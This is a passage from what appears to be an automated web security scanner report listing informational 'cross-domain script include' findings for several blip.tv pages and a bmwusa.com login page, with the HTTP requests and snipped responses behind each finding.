  • http://a.blip.tv/scripts/jquery-ui.min.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariCaptcha.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariPlayer.js?v=myapologiestothejeff
  • http://a.blip.tv/scripts/url.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/uuid.js?v=thingsrealpeoplesay
  • http://edge.quantserve.com/quant.js

Request

GET /file/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:14 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 10777
Date: Tue, 25 Jan 2011 13:13:14 GMT
X-Varnish: 1652152169
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
</script>

<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-ui.min.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariCaptcha.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/url.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariPlayer.js?v=myapologiestothejeff"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/uuid.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Dashboard.js?v=curlymcburton"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.735. http://www.blip.tv/html5/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /html5/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Dashboard.js?v=curlymcburton
  • http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/jquery-ui.min.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariCaptcha.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariPlayer.js?v=myapologiestothejeff
  • http://a.blip.tv/scripts/url.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/uuid.js?v=thingsrealpeoplesay
  • http://edge.quantserve.com/quant.js

Request

GET /html5/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Content-Type: text/html; charset=utf-8
Content-Length: 12127
Date: Tue, 25 Jan 2011 13:13:24 GMT
X-Varnish: 496206811
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
</script>

<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-ui.min.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariCaptcha.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/url.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariPlayer.js?v=myapologiestothejeff"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/uuid.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Dashboard.js?v=curlymcburton"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.736. http://www.blip.tv/play/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /play/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
  • http://edge.quantserve.com/quant.js

Request

GET /play/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Content-Type: text/html; charset=utf-8
Content-Length: 10373
Date: Tue, 25 Jan 2011 13:13:15 GMT
X-Varnish: 1794568282
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<!--format_inc_header-->
       

<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.737. http://www.blip.tv/posts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /posts

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=banner&w=728&h=90
  • http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600
  • http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay
  • http://edge.quantserve.com/quant.js

Request

GET /posts HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:28 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 51904
Date: Tue, 25 Jan 2011 13:13:28 GMT
X-Varnish: 496207028
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<!--format_inc_header-->
       

<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
<!-- BEGIN Survey widget -->
<script type="text/javascript" src="http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
<!-- END Survey widget -->

<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600" language="javascript"></script>
...[SNIP]...
</noscript>


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<center>
<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=banner&w=728&h=90" language="javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.738. http://www.blip.tv/posts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /posts/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=banner&w=728&h=90
  • http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600
  • http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay
  • http://edge.quantserve.com/quant.js

Request

GET /posts/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:18 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 52159
Date: Tue, 25 Jan 2011 13:13:18 GMT
X-Varnish: 496206167
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<!--format_inc_header-->
       

<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
<!-- BEGIN Survey widget -->
<script type="text/javascript" src="http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
<!-- END Survey widget -->

<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600" language="javascript"></script>
...[SNIP]...
</noscript>


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<center>
<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=banner&w=728&h=90" language="javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.739. http://www.blip.tv/prefs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /prefs/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Error.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Error/Help.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Form.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Form/SettingsForm.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Form/SettingsForm/LoginForm.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Utils.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
  • http://edge.quantserve.com/quant.js

Request

GET /prefs/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=prefs; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14134
Date: Tue, 25 Jan 2011 13:13:19 GMT
X-Varnish: 2104818017
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<!--format_inc_header-->
       

<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
</style>

       <script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Utils.js?v=thingsrealpeoplesay"></script>
       <script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Form.js?v=thingsrealpeoplesay"></script>
       <script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Form/SettingsForm.js?v=thingsrealpeoplesay"></script>
       <script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Form/SettingsForm/LoginForm.js?v=thingsrealpeoplesay"></script>
       <script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Error.js?v=thingsrealpeoplesay"></script>
       <script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Error/Help.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.740. http://www.blip.tv/users

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /users

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=banner&w=728&h=90
  • http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600
  • http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay
  • http://edge.quantserve.com/quant.js

Request

GET /users HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:30 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 35755
Date: Tue, 25 Jan 2011 13:13:31 GMT
X-Varnish: 496207031
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<!--format_inc_header-->
       

<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
<!-- BEGIN Survey widget -->
<script type="text/javascript" src="http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
<!-- END Survey widget -->

<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600" language="javascript"></script>
...[SNIP]...
</noscript>


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<center>
<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=banner&w=728&h=90" language="javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.741. http://www.blip.tv/users/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /users/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=banner&w=728&h=90
  • http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600
  • http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay
  • http://edge.quantserve.com/quant.js

Request

GET /users/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:20:43 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:20:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 35755
Date: Tue, 25 Jan 2011 13:13:27 GMT
X-Varnish: 496206815
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<!--format_inc_header-->
       

<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
<!-- BEGIN Survey widget -->
<script type="text/javascript" src="http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
<!-- END Survey widget -->

<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600" language="javascript"></script>
...[SNIP]...
</noscript>


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<center>
<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=banner&w=728&h=90" language="javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.742. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/Content/Forms/Login.aspx

Issue detail

The response dynamically includes the following script from another domain:
  • https://com-bmwusa.netmng.com/

Request

GET /Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
